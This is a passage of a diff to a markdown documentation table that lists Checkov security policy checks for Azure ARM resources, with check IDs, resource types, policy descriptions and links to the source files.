-| 38 | CKV_AZURE_31  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | arm   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                 |
-| 39 | CKV_AZURE_31  | resource  | configurations                                                               | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | arm   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                 |
-| 40 | CKV_AZURE_32  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | arm   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)     |
-| 41 | CKV_AZURE_32  | resource  | configurations                                                               | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | arm   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)     |
-| 42 | CKV_AZURE_33  | resource  | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests                      | arm   | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)           |
-| 43 | CKV_AZURE_34  | resource  | Microsoft.Storage/storageAccounts/blobServices/containers                    | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 44 | CKV_AZURE_34  | resource  | blobServices/containers                                                      | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 45 | CKV_AZURE_34  | resource  | containers                                                                   | Ensure that 'Public access level' is set to Private for blob containers                                      | arm   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)           |
-| 46 | CKV_AZURE_35  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure default network access rule for Storage Accounts is set to deny                                       | arm   | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py)               |
-| 47 | CKV_AZURE_36  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                    | arm   | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py)           |
-| 48 | CKV_AZURE_37  | resource  | Microsoft.Insights/logprofiles                                               | Ensure that Activity Log Retention is set 365 days or greater                                                | arm   | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                               |
-| 49 | CKV_AZURE_38  | resource  | Microsoft.Insights/logprofiles                                               | Ensure audit profile captures all the activities                                                             | arm   | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                     |
-| 50 | CKV_AZURE_39  | resource  | Microsoft.Authorization/roleDefinitions                                      | Ensure that no custom subscription owner roles are created                                                   | arm   | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                 |
-| 51 | CKV_AZURE_40  | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that the expiration date is set on all keys                                                           | arm   | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                         |
-| 52 | CKV_AZURE_41  | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that the expiration date is set on all secrets                                                        | arm   | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                   |
-| 53 | CKV_AZURE_42  | resource  | Microsoft.KeyVault/vaults                                                    | Ensure the key vault is recoverable                                                                          | arm   | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                             |
-| 54 | CKV_AZURE_47  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                      | arm   | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                   |
-| 55 | CKV_AZURE_49  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                          | arm   | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                 |
-| 56 | CKV_AZURE_50  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Virtual Machine Extensions are not Installed                                                          | arm   | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                             |
-| 57 | CKV_AZURE_58  | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces enables managed virtual networks                                        | arm   | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
-| 58 | CKV_AZURE_59  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage accounts disallow public access                                                          | arm   | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                         |
-| 59 | CKV_AZURE_63  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables HTTP logging                                                                 | arm   | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                   |
-| 60 | CKV_AZURE_65  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables detailed error messages                                                      | arm   | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)               |
-| 61 | CKV_AZURE_66  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables failed request tracing                                                       | arm   | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                 |
-| 62 | CKV_AZURE_80  | resource  | Microsoft.Web/sites/config                                                   | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                          | arm   | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                           |
-| 63 | CKV_AZURE_88  | resource  | Microsoft.Web/sites/config                                                   | Ensure that app services use Azure Files                                                                     | arm   | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                           |
-| 64 | CKV_AZURE_89  | resource  | Microsoft.Cache/redis                                                        | Ensure that Azure Cache for Redis disables public network access                                             | arm   | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                   |
-| 65 | CKV_AZURE_93  | resource  | Microsoft.Compute/disks                                                      | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm   | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                 |
-| 66 | CKV_AZURE_94  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that My SQL server enables geo-redundant backups                                                      | arm   | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                 |
-| 67 | CKV_AZURE_95  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                            | arm   | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                 |
-| 68 | CKV_AZURE_96  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that MySQL server enables infrastructure encryption                                                   | arm   | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                               |
-| 69 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine scale sets have encryption at host enabled                                       | arm   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                         |
-| 70 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine scale sets have encryption at host enabled                                       | arm   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                         |
-| 71 | CKV_AZURE_100 | resource  | Microsoft.DocumentDb/databaseAccounts                                        | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                            | arm   | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                             |
-| 72 | CKV_AZURE_101 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Azure Cosmos DB disables public network access                                                   | arm   | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                 |
-| 73 | CKV_AZURE_103 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data Factory uses Git repository for source control                                        | arm   | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                   |
-| 74 | CKV_AZURE_107 | resource  | Microsoft.ApiManagement/service                                              | Ensure that API management services use virtual networks                                                     | arm   | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                   |
-| 75 | CKV_AZURE_109 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault allows firewall rules settings                                                         | arm   | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                   |
-| 76 | CKV_AZURE_111 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables soft delete                                                                    | arm   | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                         |
-| 77 | CKV_AZURE_112 | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that key vault key is backed by HSM                                                                   | arm   | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                               |
-| 78 | CKV_AZURE_113 | resource  | Microsoft.Sql/servers                                                        | Ensure that SQL server disables public network access                                                        | arm   | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                           |
-| 79 | CKV_AZURE_114 | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that key vault secrets have "content_type" set                                                        | arm   | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                         |
-| 80 | CKV_AZURE_121 | resource  | Microsoft.Network/frontDoors                                                 | Ensure that Azure Front Door enables WAF                                                                     | arm   | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                           |
-| 81 | CKV_AZURE_123 | resource  | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                    | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                   | arm   | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                     |
-| 82 | CKV_AZURE_130 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables infrastructure encryption                                              | arm   | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                     |
-| 83 | CKV_AZURE_131 | parameter | secureString                                                                 | SecureString parameter should not have hardcoded default values                                              | arm   | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py)                |
-| 84 | CKV_AZURE_132 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                 | arm   | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                 |
-| 85 | CKV_AZURE_134 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable public network access                                        | arm   | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)               |
-| 86 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine does not enable password authentication                                          | arm   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                             |
-| 87 | CKV_AZURE_149 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine does not enable password authentication                                          | arm   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                             |
-| 88 | CKV_AZURE_151 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables encryption                                                                         | arm   | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                 |
-| 89 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that HTTP (port 80) access is restricted from the internet                                            | arm   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                     |
-| 90 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that HTTP (port 80) access is restricted from the internet                                            | arm   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                     |
-| 91 | CKV_AZURE_216 | resource  | Microsoft.Network/azureFirewalls                                             | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                      | arm   | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                           |
-| 92 | CKV_AZURE_236 | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Account is using the latest version of TLS encryption                                         | arm   | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                             |
-| 93 | CKV2_AZURE_23 | resource  | Microsoft.AppPlatform/Spring                                                 | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                          | arm   | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml)                       |
-| 94 | CKV2_AZURE_27 | resource  | Microsoft.Sql/servers                                                        | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                              | arm   | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                     |
+|     | Id            | Type      | Entity                                                                       | Policy                                                                                                       | IaC   | Resource Link                                                                                                                                                                                                |
+|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+|   0 | CKV_AZURE_1   | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                 | arm   | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                                           |
+|   1 | CKV_AZURE_2   | resource  | Microsoft.Compute/disks                                                      | Ensure Azure managed disk have encryption enabled                                                            | arm   | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                 |
+|   2 | CKV_AZURE_3   | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                      | arm   | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py)                                                 |
+|   3 | CKV_AZURE_4   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS logging to Azure Monitoring is Configured                                                         | arm   | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                   |
+|   4 | CKV_AZURE_5   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure RBAC is enabled on AKS clusters                                                                       | arm   | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                         |
+|   5 | CKV_AZURE_6   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS has an API Server Authorized IP Ranges enabled                                                    | arm   | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                         |
+|   6 | CKV_AZURE_7   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster has Network Policy configured                                                             | arm   | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                     |
+|   7 | CKV_AZURE_8   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Kubernetes Dashboard is disabled                                                                      | arm   | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                             |
+|   8 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that RDP access is restricted from the internet                                                       | arm   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                 |
+|   9 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that RDP access is restricted from the internet                                                       | arm   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                 |
+|  10 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that SSH access is restricted from the internet                                                       | arm   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                 |
+|  11 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that SSH access is restricted from the internet                                                       | arm   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                 |
+|  12 | CKV_AZURE_11  | resource  | Microsoft.Sql/servers                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                | arm   | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                       |
+|  13 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  14 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  15 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  16 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                               |
+|  17 | CKV_AZURE_13  | resource  | Microsoft.Web/sites/config                                                   | Ensure App Service Authentication is set on Azure App Service                                                | arm   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                     |
+|  18 | CKV_AZURE_13  | resource  | config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                | arm   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                     |
+|  19 | CKV_AZURE_14  | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                      | arm   | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                               |
+|  20 | CKV_AZURE_15  | resource  | Microsoft.Web/sites                                                          | Ensure web app is using the latest version of TLS encryption                                                 | arm   | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                       |
+|  21 | CKV_AZURE_16  | resource  | Microsoft.Web/sites                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                   | arm   | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                 |
+|  22 | CKV_AZURE_17  | resource  | Microsoft.Web/sites                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                              | arm   | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                               |
+|  23 | CKV_AZURE_18  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                          | arm   | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                     |
+|  24 | CKV_AZURE_19  | resource  | Microsoft.Security/pricings                                                  | Ensure that standard pricing tier is selected                                                                | arm   | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                           |
+|  25 | CKV_AZURE_20  | resource  | Microsoft.Security/securityContacts                                          | Ensure that security contact 'Phone number' is set                                                           | arm   | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                 |
+|  26 | CKV_AZURE_21  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | arm   | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                       |
+|  27 | CKV_AZURE_22  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | arm   | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                           |
+|  28 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                   | arm   | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                     |
+|  29 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                   | arm   | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                     |
+|  30 | CKV_AZURE_24  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                   | arm   | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                                                     |
+|  31 | CKV_AZURE_25  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Threat Detection types' is set to 'All'                                                         | arm   | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                           |
+|  32 | CKV_AZURE_26  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                    | arm   | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                               |
+|  33 | CKV_AZURE_27  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                             | arm   | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                               |
+|  34 | CKV_AZURE_28  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                | arm   | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                     |
+|  35 | CKV_AZURE_29  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                           | arm   | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                           |
+|  36 | CKV_AZURE_30  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | arm   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
+|  37 | CKV_AZURE_30  | resource  | configurations                                                               | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | arm   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
+|  38 | CKV_AZURE_31  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | arm   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                           |
